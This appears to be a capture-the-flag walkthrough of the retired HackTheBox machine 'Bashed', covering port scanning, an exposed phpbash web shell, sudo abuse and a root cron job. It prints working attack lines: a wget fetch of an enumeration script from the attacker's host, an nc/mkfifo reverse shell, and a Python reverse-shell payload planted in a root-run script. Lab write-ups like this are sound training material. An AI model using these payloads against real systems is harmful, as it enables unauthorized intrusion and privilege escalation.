I’ve been doing some CTFs on HackTheBox.eu since early March, and Bashed is the first of the boxes I’ve rooted to be retired since then, making it my first walkthrough.
Let’s get started.
I always start with NMAP.
nmap -v -p 1-65535 -sV -O -sS -T4 10.10.10.68
This type of nmap scan prints verbose output, runs stealth syn scan, T4 timing (quicker), OS and version detection + full port range scan.
The results of this scan indicate only 1 open port, and ALL other ports are closed. The open port is:
80/tcp http – Apache httpd 2.4.18 Ubuntu
So, we visit http://10.10.10.68, this gives us an amateur developer’s personal website. There’s no need to even view source or look too deep, because our developer is incredibly proud of his new PHP script that will launch a bash shell when you can’t get into a reverse shell. He even built it on this server!
Run dirb to enumerate your directories. Check each one… lucky for us, Arrexel has left his php scripts hanging out in the /dev directory.
Click on phpbash.php, and you’re in as user www-data. You can search for the user flag by entering find / -name user.txt | grep user.txt and the results will point you to the user.txt file in arrexel’s home directory. Cat that bad boy and move on to root.
Start your webserver on your attack box in order to host LinEnum or other scripts you may need: python –m SimpleHTTPServer 8080
Navigate to a directory we can write to, I used /tmp/, but there are others on this box.
On the target box, run wget http://10.10.X.X:8080/LinEnum.sh
Don’t forget to modify the file to be executable: chmod 777 LinEnum.sh, then execute:
Much like <machine name redacted as it hasn’t been retired yet>, we can sudo without a password as scriptmanager! More enumeration also shows us the /scripts directory where we have additional permissions as scriptmanager.
I set up a revshell.sh script in my attack boxes http directory, and used wget from the web interface to grab it into the /tmp/ directory. The contents of the .sh was:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -I 2>&1|nc 10.10.X.X 1234 >/tmp /f
This is the workaround for when nc doesn’t allow the -e options. Don’t forget to chmod to make it executable. Start your listener with nc -lvp 1234.
From the web interface phpbash.php, I executed:
sudo -u scriptmanager ‘./revshell.sh’
This gave me my first shell as script manager. I navigated to the /scripts directory, and noticed that the test.py script was owned by me, but test.txt was owned as root. I inspected the contents of test.py, its just a script that opens and writes to that file as root. I noticed that test.txt had just been created, so I waited around a bit and refreshed the file listing every few minutes. It was never more than a minute old. So, we know it’s so a cron job that runs as root, which means our shell will spawn as root.
On my attack box, I started a new nc listener on port 4444; I made a new test.py and included the following:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.X.X”,1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);
I once again used wget from the scriptmanager shell I’ve got, and deleted the old test.py, and uploaded my edited version. I waited a few seconds as this job appears to run every minute, and sure enough, I caught the shell. Navigate to root, cat root.txt.